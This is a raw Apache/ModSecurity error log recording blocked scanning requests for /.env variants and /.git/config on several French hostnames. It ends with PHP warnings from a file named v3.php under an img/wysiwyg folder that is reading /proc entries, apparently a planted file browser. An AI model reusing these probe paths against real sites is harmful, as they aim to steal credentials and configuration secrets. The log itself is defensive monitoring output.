[Mon May 11 11:53:13.481899 2026] [security2:error] [pid 1254328:tid 1254353] [client 185.177.72.9:50764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnCERdw2n9wv6Ai48IXQAAAJg"]
[Mon May 11 11:53:13.508754 2026] [security2:error] [pid 1256241:tid 1256266] [client 185.177.72.9:22054] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing-update"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.testing-update"] [unique_id "agGnCZkIEwRJMyDaV55OoAAAAVQ"]
[Mon May 11 11:53:13.509069 2026] [security2:error] [pid 1256241:tid 1256266] [client 185.177.72.9:22054] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.testing-update"] [unique_id "agGnCZkIEwRJMyDaV55OoAAAAVQ"]
[Mon May 11 11:53:14.756317 2026] [security2:error] [pid 1256241:tid 1256266] [client 185.177.72.9:22054] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnCZkIEwRJMyDaV55OoAAAAVQ"]
[Mon May 11 11:53:14.783306 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:22060] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.testing.rc1"] [unique_id "agGnChjZymfuKpjWXeh9MQAAAMc"]
[Mon May 11 11:53:14.783844 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:22060] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.testing.rc1"] [unique_id "agGnChjZymfuKpjWXeh9MQAAAMc"]
[Mon May 11 11:53:16.104586 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:22060] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnChjZymfuKpjWXeh9MQAAAMc"]
[Mon May 11 11:53:16.141104 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:22072] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing.rc1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.testing.rc1"] [unique_id "agGnDERdw2n9wv6Ai48IXwAAAI4"]
[Mon May 11 11:53:16.141618 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:22072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.testing.rc1"] [unique_id "agGnDERdw2n9wv6Ai48IXwAAAI4"]
[Mon May 11 11:53:17.824371 2026] [security2:error] [pid 1254328:tid 1254399] [client 185.177.72.9:22072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnDERdw2n9wv6Ai48IXwAAAI4"]
[Mon May 11 11:53:17.855304 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:22074] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.tmp.alpha"] [unique_id "agGnDURdw2n9wv6Ai48IZgAAAJA"]
[Mon May 11 11:53:17.856961 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:22074] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.tmp.alpha"] [unique_id "agGnDURdw2n9wv6Ai48IZgAAAJA"]
[Mon May 11 11:53:18.939860 2026] [authz_core:error] [pid 1254133:tid 1254150] [client 20.78.158.176:4003] AH01630: client denied by server configuration: proxy:http://127.0.0.1:2079/wp-admin/license.php
[Mon May 11 11:53:20.364916 2026] [security2:error] [pid 1254328:tid 1254346] [client 185.177.72.9:22074] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnDURdw2n9wv6Ai48IZgAAAJA"]
[Mon May 11 11:53:20.394975 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:22076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.tmp.alpha"] [unique_id "agGnEGS6k_SCYd1AVZquGwAAARc"]
[Mon May 11 11:53:20.395219 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:22076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.tmp.alpha"] [unique_id "agGnEGS6k_SCYd1AVZquGwAAARc"]
[Mon May 11 11:53:23.050006 2026] [security2:error] [pid 1254179:tid 1254204] [client 185.177.72.9:22076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnEGS6k_SCYd1AVZquGwAAARc"]
[Mon May 11 11:53:23.085365 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:22088] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env.tmp.template"] [unique_id "agGnE2S6k_SCYd1AVZquJAAAARE"]
[Mon May 11 11:53:23.085836 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:22088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env.tmp.template"] [unique_id "agGnE2S6k_SCYd1AVZquJAAAARE"]
[Mon May 11 11:53:25.365752 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:22088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnE2S6k_SCYd1AVZquJAAAARE"]
[Mon May 11 11:53:25.398509 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:65154] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.tmp.template"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env.tmp.template"] [unique_id "agGnFb4KNmD_mZ_vlf841wAAAEU"]
[Mon May 11 11:53:25.399746 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:65154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env.tmp.template"] [unique_id "agGnFb4KNmD_mZ_vlf841wAAAEU"]
[Mon May 11 11:53:27.119541 2026] [security2:error] [pid 1254242:tid 1254251] [client 185.177.72.9:65154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnFb4KNmD_mZ_vlf841wAAAEU"]
[Mon May 11 11:53:27.150128 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:65162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/.babelrc.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env/.babelrc.sample"] [unique_id "agGnF0Rdw2n9wv6Ai48IcAAAAIQ"]
[Mon May 11 11:53:27.150525 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:65162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env/.babelrc.sample"] [unique_id "agGnF0Rdw2n9wv6Ai48IcAAAAIQ"]
[Mon May 11 11:53:27.900237 2026] [security2:error] [pid 1256241:tid 1256253] [client 35.205.208.178:38462] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agGnF5kIEwRJMyDaV55OswAAAUc"]
[Mon May 11 11:53:27.900749 2026] [security2:error] [pid 1256241:tid 1256253] [client 35.205.208.178:38462] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agGnF5kIEwRJMyDaV55OswAAAUc"]
[Mon May 11 11:53:27.902458 2026] [security2:error] [pid 1256241:tid 1256253] [client 35.205.208.178:38462] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.git/config"] [unique_id "agGnF5kIEwRJMyDaV55OswAAAUc"]
[Mon May 11 11:53:28.917758 2026] [security2:error] [pid 1254328:tid 1254335] [client 185.177.72.9:65162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnF0Rdw2n9wv6Ai48IcAAAAIQ"]
[Mon May 11 11:53:28.949479 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:65166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/.babelrc.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env/.babelrc.sample"] [unique_id "agGnGBjZymfuKpjWXeh9VAAAAM8"]
[Mon May 11 11:53:28.950478 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:65166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env/.babelrc.sample"] [unique_id "agGnGBjZymfuKpjWXeh9VAAAAM8"]
[Mon May 11 11:53:31.150001 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:65166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnGBjZymfuKpjWXeh9VAAAAM8"]
[Mon May 11 11:53:31.176090 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:65178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/build.xml-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env/build.xml-old"] [unique_id "agGnG5kIEwRJMyDaV55OtAAAAUY"]
[Mon May 11 11:53:31.176506 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:65178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env/build.xml-old"] [unique_id "agGnG5kIEwRJMyDaV55OtAAAAUY"]
[Mon May 11 11:53:32.519506 2026] [security2:error] [pid 1256241:tid 1256252] [client 185.177.72.9:65178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnG5kIEwRJMyDaV55OtAAAAUY"]
[Mon May 11 11:53:32.548226 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:65194] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env/build.xml-old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/.env/build.xml-old"] [unique_id "agGnHBjZymfuKpjWXeh9VQAAAMY"]
[Mon May 11 11:53:32.549185 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:65194] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/.env/build.xml-old"] [unique_id "agGnHBjZymfuKpjWXeh9VQAAAMY"]
[Mon May 11 11:53:34.385082 2026] [security2:error] [pid 1254133:tid 1254142] [client 185.177.72.9:65194] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGnHBjZymfuKpjWXeh9VQAAAMY"]
PHP Warning:  filesize(): stat failed for /proc/17/task/17/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/17/task/17/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/17/task/17/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/17/task/17/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/17/task/17/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/17/task/17/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/36/task/36/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/36/task/36/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/36/task/36/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/36/task/36/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/36/task/36/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/36/task/36/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
